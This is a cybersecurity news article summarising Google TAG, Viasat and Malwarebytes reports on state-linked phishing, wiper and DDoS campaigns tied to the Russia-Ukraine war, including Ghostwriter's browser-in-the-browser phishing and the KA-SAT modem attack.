A Belarusian cyber group known as Ghostwriter (also referred to as UNC1151) has been identified exploiting the recently uncovered browser-in-the-browser (BitB) technique in ongoing credential phishing attacks linked to the persistent Russo-Ukrainian conflict. This method employs a deceptive simulation of a browser window that appears legitimate, allowing attackers to execute sophisticated social engineering strategies that deceive unsuspecting users.
The Google Threat Analysis Group (TAG) highlighted in a recent report that Ghostwriter has rapidly adopted the BitB method, integrating it with pre-existing techniques that involve hosting phishing landing pages on compromised websites. This strategy facilitates the capture of sensitive login information by redirecting data to an external server controlled by the attackers.
Beyond Ghostwriter, various other threat actors have been implicated in using the backdrop of conflict as bait for phishing and malware campaigns. Groups such as Mustang Panda and Scarab, along with state-sponsored entities from Iran, North Korea, and Russia, are all employing similar tactics to lure victims into clicking on malicious links or engaging with fraudulent emails.
TAG has also attributed a hacking group known as Curious Gorge to China’s People’s Liberation Army Strategic Support Force (PLASSF) for conducting cyber operations against governmental and military targets in Ukraine, Russia, Kazakhstan, and Mongolia. Furthermore, another actor, the Russia-based COLDRIVER (or Callisto), has launched credential phishing campaigns targeting U.S. NGOs, think tanks, and various Eastern European military entities.
Billy Leonard, a TAG researcher, noted that this marks the first instance of COLDRIVER specifically targeting multiple Eastern European militaries. These campaigns utilized newly created Gmail accounts to reach non-Google email addresses, leaving the overall effectiveness of such efforts still uncertain.
Recent disclosures from Viasat, a U.S.-based telecommunications company, reveal details of a “multifaceted and deliberate” cyberattack executed against its KA-SAT network on February 24, 2022, coinciding with Russia’s invasion of Ukraine. The assault resulted in the disconnection of tens of thousands of modems, significantly impacting customers across Ukraine and Europe, including disrupting operations of approximately 5,800 wind turbines managed by Germany’s Enercon.
Viasat clarified that while the attack disrupted services, there was no indication of end-user data being accessed or compromised. The intrusion exploited a misconfiguration in a VPN appliance, allowing remote access to the KA-SAT network and executing destructive commands that temporarily rendered modems inoperable.
The series of attacks and the emergence of widespread malicious cyber activities underscore the evolving threat landscape since the onset of hostilities in Eastern Europe. Networks across both governmental and commercial sectors have endured disruptions characterized by data-wiping malware and ongoing distributed denial-of-service (DDoS) attacks.
Researchers have noted attempts to compromise legitimate WordPress sites, injecting rogue JavaScript designed to spearhead DDoS attacks against Ukrainian domains. In addition, Malwarebytes Labs recently reported on new spear-phishing assaults targeting Russian citizens and government bodies, utilizing persuasive tactics to deploy malware such as Cobalt Strike.
The spear-phishing schemes entice recipients with warnings of potential criminal charges for engaging with banned platforms, luring them into opening malicious documents that exploit the MSHTML vulnerability (CVE-2021-40444). This enables attackers to leverage PowerShell commands to deploy malicious code, thereby facilitating further breaches.
The threat landscape is compounded by activity from a Russian adversary known as Carbon Spider (or FIN7), employing similar tactics aimed at deploying malware that can facilitate information theft or unauthorized access. Malwarebytes has identified a notable surge in various malware families being utilized to target both Ukrainian and Russian systems, aligning with the timeline of the ongoing conflict.
These events highlight the critical need for organizations to adopt robust cybersecurity measures and remain vigilant against evolving threats, particularly in a climate where geopolitical events can rapidly influence cyber activity. Understanding the tactics identified in the MITRE ATT&CK framework is essential for identifying potential vulnerabilities and fortifying defenses against future attacks.
“As these cybersecurity threats become increasingly sophisticated and targeted, vigilance and proactive defensive approaches have never been more critical for organizations in both Ukraine and globally,” said a representative from Malwarebytes Labs. Adopting a comprehensive cybersecurity posture can help mitigate risks and safeguard against potential incidents driven by these persistent and evolving threats.
